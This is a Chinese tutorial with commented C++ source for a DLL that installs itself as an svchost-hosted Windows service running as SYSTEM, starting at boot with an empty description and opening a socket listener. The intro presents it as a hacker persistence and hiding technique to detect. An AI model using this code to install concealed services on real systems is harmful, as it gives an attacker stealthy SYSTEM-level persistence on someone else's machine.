Svchost本身只是一个服务宿主，并不实现任何服务功能；需要由Svchost启动的服务以动态链接库（DLL）的形式实现。安装这类服务时，把服务的可执行程序指向svchost.exe（并通过 -k 参数指定所属服务组），启动时由svchost加载相应的服务DLL并调用其导出的ServiceMain。由于这类服务以LocalSystem权限运行、在进程列表中只表现为一个普通的svchost.exe实例，该机制常被黑客用作持久化和隐藏手段——下面的代码就是一个最小示例，阅读时请把它当作需要防御和检测的对象。mySocket是一个socket通讯类，其实现未随本文给出；若需要请发邮件到[email protected]。
【[C/C++]代码】
#include "stdafx.h"
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>
#include "mySocket.h"
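// Service name. Install() also uses it as the svchost group name
// ("-k zhixin") and as the value name under the Svchost registry key.
char chServiceName[] = "zhixin";
// Service description written to the Services key; intentionally empty.
char chDescription[] = "";
// Status handle returned by RegisterServiceCtrlHandler in ServiceMain and
// used by ServiceHandler to report state changes.
SERVICE_STATUS_HANDLE hServiceStatus;
// Status block reported to the SCM. Shared between ServiceMain and
// ServiceHandler, which the SCM may invoke on a different thread — there is
// no synchronisation on it in this file.
SERVICE_STATUS ServiceStatus;
// Not referenced anywhere in this file (the original comment called it a
// "process ID"); kept in case another translation unit uses it.
DWORD dwThreadId;
// Network listener started by doAction() and stopped from the STOP control.
mySocket sock;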
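/**
 * Check whether process dwPid currently has a module loaded from path dll.
 *
 * @param dwPid  process id to inspect
 * @param dll    full path of the module, compared against
 *               MODULEENTRY32::szExePath of every module in the snapshot
 * @return TRUE if a module with that path is loaded; FALSE if none matches,
 *         if dll is NULL, or if the snapshot could not be taken
 *
 * Windows paths are case-insensitive, so the comparison uses _stricmp; the
 * original strcmp() missed e.g. "System32" vs "system32". The path must
 * already be expanded — a string still containing "%SystemRoot%" never
 * matches what the loader records.
 *
 * NOTE(review): CreateToolhelp32Snapshot(TH32CS_SNAPMODULE) is documented to
 * fail transiently with ERROR_BAD_LENGTH while the target is loading modules;
 * a caller that needs a reliable answer should retry. Not handled here.
 */
BOOL ExistsDll(DWORD dwPid, const char *dll)
{
    if (dll == NULL)
        return FALSE;

    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPid);
    if (hSnap == INVALID_HANDLE_VALUE)
        return FALSE;

    BOOL found = FALSE;
    MODULEENTRY32 me32 = {0};
    me32.dwSize = sizeof(me32);

    // Walk every module in the snapshot: first entry, then the rest.
    for (BOOL more = Module32First(hSnap, &me32); more; more = Module32Next(hSnap, &me32))
    {
        if (_stricmp(me32.szExePath, dll) == 0)
        {
            found = TRUE;
            break;
        }
    }

    CloseHandle(hSnap);
    return found;
}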
/**
 * Service body: run the socket server.
 *
 * Called from ServiceMain once the service has reported RUNNING. Presumably
 * does not return until the listener exits (mySocket is not shown here).
 */
void doAction(void)
{
    sock.startServer();
}
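/**
 * Number of bytes RegSetValueEx must be given for a string value of type kType.
 *
 * REG_MULTI_SZ data is a sequence of NUL-terminated strings closed by an empty
 * string, so it is measured up to and including the double NUL; strlen() would
 * stop at the first NUL and drop both terminators. Any other string type
 * (REG_SZ, REG_EXPAND_SZ) is its length plus the single terminating NUL.
 *
 * @param kType  registry value type
 * @param Data   NUL-terminated string (double-NUL-terminated for REG_MULTI_SZ)
 * @return byte count including terminator(s)
 */
static DWORD RegStringSize(unsigned long kType, const char *Data)
{
    if (kType != REG_MULTI_SZ)
        return (DWORD)(strlen(Data) + 1);

    // Empty list: just the terminating pair of NULs.
    if (Data[0] == '\0')
        return 2;

    size_t len = 0;
    while (Data[len] != '\0')
        len += strlen(Data + len) + 1;   // each element plus its NUL
    return (DWORD)(len + 1);             // plus the list terminator
}

/**
 * Create (or open) hRoot\szSubKey and write the string value ValueName.
 *
 * @param hRoot      root key (e.g. HKEY_LOCAL_MACHINE)
 * @param szSubKey   subkey path, created if missing
 * @param kType      REG_SZ, REG_EXPAND_SZ or REG_MULTI_SZ
 * @param ValueName  value name to set
 * @param Data       NUL-terminated string (double-NUL for REG_MULTI_SZ)
 * @return TRUE on success, FALSE if the key could not be created/opened,
 *         the value could not be written, or szSubKey/Data is NULL
 *
 * Changes from the original: the data size now includes the terminating
 * NUL(s) as RegSetValueEx requires — the old strlen(Data) truncated the
 * REG_MULTI_SZ svchost group list written by Install() to six bytes with no
 * terminator at all; the key handle is closed on the failure path instead of
 * leaking; and only KEY_SET_VALUE is requested rather than KEY_ALL_ACCESS.
 */
BOOL CreateStringReg(HKEY hRoot, const char *szSubKey, unsigned long kType, const char *ValueName, const char *Data)
{
    if (szSubKey == NULL || Data == NULL)
        return FALSE;

    HKEY hKey = NULL;
    LONG lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
                               KEY_SET_VALUE, NULL, &hKey, NULL);
    if (lRet != ERROR_SUCCESS)
        return FALSE;

    lRet = RegSetValueEx(hKey, ValueName, 0, (DWORD)kType,
                         (const BYTE *)Data, RegStringSize(kType, Data));
    RegCloseKey(hKey);
    return lRet == ERROR_SUCCESS;
}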
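/**
 * Create (or open) hRoot\szSubKey and write the REG_DWORD value ValueName.
 *
 * @param hRoot      root key (e.g. HKEY_LOCAL_MACHINE)
 * @param szSubKey   subkey path, created if missing
 * @param ValueName  value name to set
 * @param Data       32-bit value to store
 * @return TRUE on success, FALSE if the key could not be created/opened,
 *         the value could not be written, or szSubKey is NULL
 *
 * Changes from the original: the key handle is closed on the failure path
 * instead of leaking, and only KEY_SET_VALUE is requested rather than
 * KEY_ALL_ACCESS.
 */
BOOL CreateDWORDReg(HKEY hRoot, const char *szSubKey, const char *ValueName, DWORD Data)
{
    if (szSubKey == NULL)
        return FALSE;

    HKEY hKey = NULL;
    LONG lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
                               KEY_SET_VALUE, NULL, &hKey, NULL);
    if (lRet != ERROR_SUCCESS)
        return FALSE;

    lRet = RegSetValueEx(hKey, ValueName, 0, REG_DWORD, (const BYTE *)&Data, sizeof(Data));
    RegCloseKey(hKey);
    return lRet == ERROR_SUCCESS;
}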
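/**
 * Register this DLL as an svchost-hosted service named chServiceName.
 *
 * 1. Creates the service through the SCM with svchost.exe as its image and
 *    "zhixin" as its svchost group (the "-k zhixin" argument).
 * 2. Adds the registry data svchost needs on top of what CreateService
 *    writes: the group -> service-list value under
 *    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, the service
 *    Description, and the ServiceDll value under the service's Parameters key
 *    pointing at this DLL.
 *
 * CreateService itself writes ImagePath, DisplayName, ObjectName,
 * ErrorControl and Start, so the original's second copy of those values via
 * the registry was redundant and has been dropped.
 *
 * Security notes: the service runs as LocalSystem (NULL account), starts
 * automatically, and lives inside svchost.exe, so it is visible only as one
 * more svchost instance; the listener opened by doAction() therefore runs
 * with SYSTEM privileges. Install needs administrative rights and assumes the
 * DLL has already been copied to %SystemRoot%\system32\test.dll — nothing
 * here checks that the file exists or that it is the intended binary.
 *
 * Failures are reported with OutputDebugString only; the function returns
 * early if the SCM steps fail and logs if any registry write fails.
 */
extern "C" _declspec(dllexport) void Install()
{
    // Paths keep %SystemRoot% so the SCM / svchost expand them (REG_EXPAND_SZ).
    static const char bin[] = "%SystemRoot%\\System32\\svchost.exe -k zhixin"; // -k: svchost group
    static const char dll[] = "%SystemRoot%\\system32\\test.dll";              // this DLL; not copied here
    static const char svcParamsKey[] = "SYSTEM\\CurrentControlSet\\Services\\zhixin\\Parameters";
    static const char svcKey[]       = "SYSTEM\\CurrentControlSet\\Services\\zhixin";
    static const char svchostKey[]   = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";

    SC_HANDLE hscm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
    if (hscm == NULL)
    {
        OutputDebugString("OpenSCManager error\n");
        return;
    }

    SC_HANDLE schService = CreateService(
        hscm,                        // SCManager database
        chServiceName,               // service name
        chServiceName,               // display name
        SERVICE_QUERY_STATUS,        // handle is only closed below; ALL_ACCESS not needed
        SERVICE_WIN32_SHARE_PROCESS, // shares the svchost process
        SERVICE_AUTO_START,          // starts at boot
        SERVICE_ERROR_NORMAL,        // error control
        bin,                         // service binary (svchost + group)
        NULL,                        // no load-ordering group
        NULL,                        // no tag identifier
        NULL,                        // no dependencies
        NULL,                        // LocalSystem account
        NULL);                       // no password
    if (schService == NULL)
    {
        OutputDebugString("CreateService('zhixin') error\n");
        CloseServiceHandle(hscm);    // the original leaked this handle on failure
        return;
    }
    CloseServiceHandle(schService);
    CloseServiceHandle(hscm);

    BOOL ok = TRUE;
    // Group -> service list. REG_MULTI_SZ: every name NUL-terminated, list closed by an extra NUL.
    ok = CreateStringReg(HKEY_LOCAL_MACHINE, svchostKey, REG_MULTI_SZ, chServiceName, "zhixin\0\0") && ok;
    // Values CreateService does not set.
    ok = CreateStringReg(HKEY_LOCAL_MACHINE, svcKey, REG_SZ, "Description", chDescription) && ok;
    ok = CreateStringReg(HKEY_LOCAL_MACHINE, svcParamsKey, REG_EXPAND_SZ, "ServiceDll", dll) && ok;
    if (!ok)
        OutputDebugString("Install: registry configuration incomplete\n");
}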
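/**
 * Remove the service registered by Install().
 *
 * Stops and deletes the service through the SCM, then removes the svchost
 * group value and the service's registry keys. Unlike the original, a failure
 * to open the service (e.g. it was already deleted) no longer skips the
 * registry cleanup, so a half-installed state can still be cleared. Every SCM
 * handle is closed on every path.
 *
 * NOTE(review): DeleteService only marks the service for deletion; the SCM
 * removes Services\zhixin itself once the service has stopped and the last
 * handle is closed, so the explicit RegDeleteKey calls below may fail
 * harmlessly if the SCM still owns the key at that moment. Their results are
 * deliberately not treated as errors.
 */
extern "C" _declspec(dllexport) void UnInstall()
{
    static const char svcParamsKey[] = "SYSTEM\\CurrentControlSet\\Services\\zhixin\\Parameters";
    static const char svcKey[]       = "SYSTEM\\CurrentControlSet\\Services\\zhixin";
    static const char svchostKey[]   = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";

    // SC_MANAGER_CONNECT is all OpenService needs.
    SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    if (!hSCM)
    {
        OutputDebugString("OpenSCManager error\n");
        return;
    }

    SC_HANDLE hService = OpenService(hSCM, chServiceName, SERVICE_STOP | DELETE);
    if (hService)
    {
        SERVICE_STATUS status = {0};
        // Already stopped is not an error for removal purposes.
        if (!ControlService(hService, SERVICE_CONTROL_STOP, &status) &&
            GetLastError() != ERROR_SERVICE_NOT_ACTIVE)
        {
            OutputDebugString("ControlService(stop) error\n");
        }
        if (!DeleteService(hService))
            OutputDebugString("DeleteService error\n");
        CloseServiceHandle(hService);
    }
    else
    {
        OutputDebugString("OpenService error\n");
    }
    CloseServiceHandle(hSCM);

    // Registry cleanup: group value first, then the service keys (child before parent).
    HKEY hKey = NULL;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, svchostKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS)
    {
        if (RegDeleteValue(hKey, chServiceName) != ERROR_SUCCESS)
            OutputDebugString("RegDeleteValue(Svchost\\zhixin) error\n");
        RegCloseKey(hKey);
    }
    RegDeleteKey(HKEY_LOCAL_MACHINE, svcParamsKey);
    RegDeleteKey(HKEY_LOCAL_MACHINE, svcKey);
}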
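/**
 * Control handler registered by ServiceMain (LPHANDLER_FUNCTION, __stdcall).
 *
 * STOP: report STOP_PENDING, shut the listener down, then report STOPPED.
 * The original reported STOPPED before sock.stopServer() had run, telling the
 * SCM the service was gone while its code was still executing inside svchost.
 * INTERROGATE / PAUSE / CONTINUE: re-report the current status — the SCM
 * expects a SetServiceStatus call in response, and nothing here actually
 * pauses, so the state is left unchanged.
 * SHUTDOWN / PARAMCHANGE / anything else: ignored, as in the original.
 *
 * NOTE(review): the SCM may call this on a different thread from ServiceMain;
 * ServiceStatus is shared with no synchronisation, same as the original.
 */
void __stdcall ServiceHandler(DWORD dwCommand)
{
    switch (dwCommand)
    {
    case SERVICE_CONTROL_STOP:
        OutputDebugString("SERVICE_CONTROL_STOP\n");
        ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
        ServiceStatus.dwControlsAccepted = 0;   // no further controls while stopping
        ServiceStatus.dwWaitHint = 3000;        // ms the SCM should wait before complaining
        SetServiceStatus(hServiceStatus, &ServiceStatus);

        sock.stopServer();

        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        ServiceStatus.dwWaitHint = 0;
        SetServiceStatus(hServiceStatus, &ServiceStatus);
        break;

    case SERVICE_CONTROL_INTERROGATE:
    case SERVICE_CONTROL_PAUSE:
    case SERVICE_CONTROL_CONTINUE:
        SetServiceStatus(hServiceStatus, &ServiceStatus);
        break;

    case SERVICE_CONTROL_SHUTDOWN:
    case SERVICE_CONTROL_PARAMCHANGE:
    default:
        break;
    }
}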
//extern “C” __declspec(dllexport) void WINAPI ServiceMain( int argc, wchar_t *argv[] )
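/**
 * Entry point svchost calls after loading the ServiceDll for service "zhixin".
 *
 * Registers the control handler, reports START_PENDING then RUNNING, runs the
 * service body (doAction) and, if that returns without the STOP control having
 * already reported STOPPED, reports STOPPED so the SCM does not keep showing
 * RUNNING for a service whose code has exited.
 *
 * Changes from the original:
 *  - WINAPI (__stdcall): svchost calls ServiceMain with the stdcall convention;
 *    a cdecl definition is a stack mismatch on 32-bit builds. svchost resolves
 *    the export by its plain name, and on x86 MSVC __stdcall decorates the
 *    symbol (_ServiceMain@8) — the linker directive below re-exports it under
 *    the undecorated name; on x64 __FUNCDNAME__ is already "ServiceMain" and
 *    the directive is a harmless repeat of the dllexport. MSVC-specific.
 *  - dwServiceType is SERVICE_WIN32_SHARE_PROCESS, matching the type given to
 *    CreateService in Install(); the original said SERVICE_WIN32.
 *  - SERVICE_ACCEPT_PAUSE_CONTINUE is no longer advertised: the handler does
 *    not implement pause/continue.
 *
 * @param argc  argument count from the SCM (unused)
 * @param argv  arguments from the SCM; argv[0] is the service name (unused)
 */
extern "C" __declspec(dllexport) void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
{
#pragma comment(linker, "/EXPORT:ServiceMain=" __FUNCDNAME__)
    (void)argc;
    (void)argv;

    ServiceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;

    hServiceStatus = RegisterServiceCtrlHandler(chServiceName, ServiceHandler);
    if (!hServiceStatus)
    {
        OutputDebugString("RegisterServiceCtrlHandler error\n");
        return;
    }

    // Let the SCM know we are alive before doing any work, then go RUNNING.
    SetServiceStatus(hServiceStatus, &ServiceStatus);
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    if (SetServiceStatus(hServiceStatus, &ServiceStatus) == 0)
    {
        OutputDebugString("SetServiceStatus Error !\n");
        return;
    }

    doAction();

    // Reached when the listener returned on its own; the STOP control path in
    // ServiceHandler has already reported STOPPED, so do not report it twice.
    if (ServiceStatus.dwCurrentState != SERVICE_STOPPED)
    {
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        ServiceStatus.dwControlsAccepted = 0;
        SetServiceStatus(hServiceStatus, &ServiceStatus);
    }
}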
/**
 * DLL entry point.
 *
 * Nothing is set up or torn down here: all work happens in the exported
 * Install/UnInstall/ServiceMain entry points, so every attach/detach reason
 * is accepted and the load always succeeds.
 *
 * @param hModule             module handle (unused)
 * @param ul_reason_for_call  DLL_PROCESS_ATTACH/DETACH or DLL_THREAD_ATTACH/DETACH (unused)
 * @param lpReserved          reserved (unused)
 * @return TRUE always
 */
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}